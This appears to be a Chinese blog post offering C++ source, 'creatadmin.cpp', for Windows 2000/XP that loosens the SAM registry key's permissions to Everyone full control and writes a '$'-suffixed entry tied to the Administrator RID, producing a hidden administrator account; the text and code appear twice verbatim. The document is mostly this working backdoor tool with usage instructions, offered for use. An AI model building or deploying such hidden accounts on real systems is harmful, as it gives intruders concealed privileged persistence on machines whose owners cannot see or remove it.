关于增加一个隐藏帐号,
在注册表增加如下:
所以把这个[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\A$]
@=hex(1f4):
对2000和xp有效,但是重启之后,进入管理工具中无法打开用户一拦
xp中启动截面只能够用经典的登陆,即输入两次ctrl+alt+del才可以!
代码是参考网上的,很简单,只是增加了以上的注册表健值!
xp+vs.net 2003编译通过
// creatadmin.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
#include <Windows.h>
#include <Aclapi.h>
/* 在注册表sam键下面的SAM\\SAM\\Domains\\Account\\Users\\Names新加一个带"$"的用户就可以实现隐藏;在2000,xp下测试
问题:2000下重启后在计算机管理工具中的本地用户和组将无法再显示
xp的启动界面只能够由经典的登陆模式,即双击ctrl+alt+del登陆!!!*/
void _tmain(int argc, _TCHAR* argv[])
{
std::string sam = "SAM\\SAM\\Domains\\Account\\Users\\Names";
if (argc != 2)
{
printf("Welcome to Http://systest2005.52blog.net\nmail to:systest2005@126.com!");
printf("\nYou must input the name of administrators you want to create!");
printf("\nUsage:%s name",argv[0] );
printf("\n<name> must end with $");
exit(0);
}
int n = strlen(argv[1]);
if (argv[1][n-1] != '$')
{
printf("The name must end with $");
exit(0);
}
char *s = argv[1];
/*以下代码为网上搜索而来,我也不知道最先的出处*/
DWORD dwRet;
LPSTR SamName = "MACHINE\\SAM\\SAM";
PSECURITY_DESCRIPTOR pSD = NULL;
PACL pOldDacl = NULL;
PACL pNewDacl = NULL;
EXPLICIT_ACCESS ea;
HKEY hKey = NULL;
HKEY mkey = NULL;
// 获取SAM主键的DACL
dwRet = GetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
NULL, NULL, &pOldDacl, NULL, &pSD);
if (dwRet != ERROR_SUCCESS)
{
printf("GetNamedSecurityInfo Error: %d\n", dwRet);
goto FreeAndExit;
}
// 创建一个ACE,允许Everyone完全控制对象,并允许子对象继承此权限
ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
BuildExplicitAccessWithName(&ea, "Everyone", KEY_ALL_ACCESS, SET_ACCESS,
SUB_CONTAINERS_AND_OBJECTS_INHERIT);
// 将新的ACE加入DACL
dwRet = SetEntriesInAcl(1, &ea, pOldDacl, &pNewDacl);
if (dwRet != ERROR_SUCCESS)
{
printf("SetEntriesInAcl Error: %d\n", dwRet);
goto FreeAndExit;
}
// 更新SAM主键的DACL
dwRet = SetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
NULL, NULL, pNewDacl, NULL);
if (dwRet != ERROR_SUCCESS)
{
printf("SetNamedSecurityInfo Error: %d\n", dwRet);
goto FreeAndExit;
}
// 打开SAM的子键
dwRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SAM\\SAM\\Domains\\Account\\Users\\names\\",
0, KEY_ALL_ACCESS, &hKey);
if (dwRet != ERROR_SUCCESS)
{
printf("Reg Open KeyError: %d\n", dwRet);
goto FreeAndExit;
}
dwRet = RegCreateKey(hKey,s,&mkey);
if (dwRet != ERROR_SUCCESS)
{
printf("Reg CreatKey Error: %d\n", dwRet);
goto FreeAndExit;
}
dwRet = RegSetValueEx(mkey,NULL,NULL,0x1f4,NULL,0);
if (dwRet != ERROR_SUCCESS)
{
printf("set Key value Error: %d\n", dwRet);
goto FreeAndExit;
}
printf("create SAM Subkey Successfully.\n");
RegCloseKey(hKey);
RegCloseKey(mkey);
FreeAndExit:
if (hKey) RegCloseKey(hKey);
if (pNewDacl) LocalFree(pNewDacl);
// 还原SAM主键的DACL
if (pOldDacl) SetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
NULL, NULL, pOldDacl, NULL);
if (pSD) LocalFree(pSD);
return ;
}
在注册表增加如下:
所以把这个[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\A$]
@=hex(1f4):
对2000和xp有效,但是重启之后,进入管理工具中无法打开用户一拦
xp中启动截面只能够用经典的登陆,即输入两次ctrl+alt+del才可以!
代码是参考网上的,很简单,只是增加了以上的注册表健值!
xp+vs.net 2003编译通过
// creatadmin.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
#include <Windows.h>
#include <Aclapi.h>
/* 在注册表sam键下面的SAM\\SAM\\Domains\\Account\\Users\\Names新加一个带"$"的用户就可以实现隐藏;在2000,xp下测试
问题:2000下重启后在计算机管理工具中的本地用户和组将无法再显示
xp的启动界面只能够由经典的登陆模式,即双击ctrl+alt+del登陆!!!*/
void _tmain(int argc, _TCHAR* argv[])
{
std::string sam = "SAM\\SAM\\Domains\\Account\\Users\\Names";
if (argc != 2)
{
printf("Welcome to Http://systest2005.52blog.net\nmail to:systest2005@126.com!");
printf("\nYou must input the name of administrators you want to create!");
printf("\nUsage:%s name",argv[0] );
printf("\n<name> must end with $");
exit(0);
}
int n = strlen(argv[1]);
if (argv[1][n-1] != '$')
{
printf("The name must end with $");
exit(0);
}
char *s = argv[1];
/*以下代码为网上搜索而来,我也不知道最先的出处*/
DWORD dwRet;
LPSTR SamName = "MACHINE\\SAM\\SAM";
PSECURITY_DESCRIPTOR pSD = NULL;
PACL pOldDacl = NULL;
PACL pNewDacl = NULL;
EXPLICIT_ACCESS ea;
HKEY hKey = NULL;
HKEY mkey = NULL;
// 获取SAM主键的DACL
dwRet = GetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
NULL, NULL, &pOldDacl, NULL, &pSD);
if (dwRet != ERROR_SUCCESS)
{
printf("GetNamedSecurityInfo Error: %d\n", dwRet);
goto FreeAndExit;
}
// 创建一个ACE,允许Everyone完全控制对象,并允许子对象继承此权限
ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
BuildExplicitAccessWithName(&ea, "Everyone", KEY_ALL_ACCESS, SET_ACCESS,
SUB_CONTAINERS_AND_OBJECTS_INHERIT);
// 将新的ACE加入DACL
dwRet = SetEntriesInAcl(1, &ea, pOldDacl, &pNewDacl);
if (dwRet != ERROR_SUCCESS)
{
printf("SetEntriesInAcl Error: %d\n", dwRet);
goto FreeAndExit;
}
// 更新SAM主键的DACL
dwRet = SetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
NULL, NULL, pNewDacl, NULL);
if (dwRet != ERROR_SUCCESS)
{
printf("SetNamedSecurityInfo Error: %d\n", dwRet);
goto FreeAndExit;
}
// 打开SAM的子键
dwRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SAM\\SAM\\Domains\\Account\\Users\\names\\",
0, KEY_ALL_ACCESS, &hKey);
if (dwRet != ERROR_SUCCESS)
{
printf("Reg Open KeyError: %d\n", dwRet);
goto FreeAndExit;
}
dwRet = RegCreateKey(hKey,s,&mkey);
if (dwRet != ERROR_SUCCESS)
{
printf("Reg CreatKey Error: %d\n", dwRet);
goto FreeAndExit;
}
dwRet = RegSetValueEx(mkey,NULL,NULL,0x1f4,NULL,0);
if (dwRet != ERROR_SUCCESS)
{
printf("set Key value Error: %d\n", dwRet);
goto FreeAndExit;
}
printf("create SAM Subkey Successfully.\n");
RegCloseKey(hKey);
RegCloseKey(mkey);
FreeAndExit:
if (hKey) RegCloseKey(hKey);
if (pNewDacl) LocalFree(pNewDacl);
// 还原SAM主键的DACL
if (pOldDacl) SetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
NULL, NULL, pOldDacl, NULL);
if (pSD) LocalFree(pSD);
return ;
}
扫一扫
2428
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
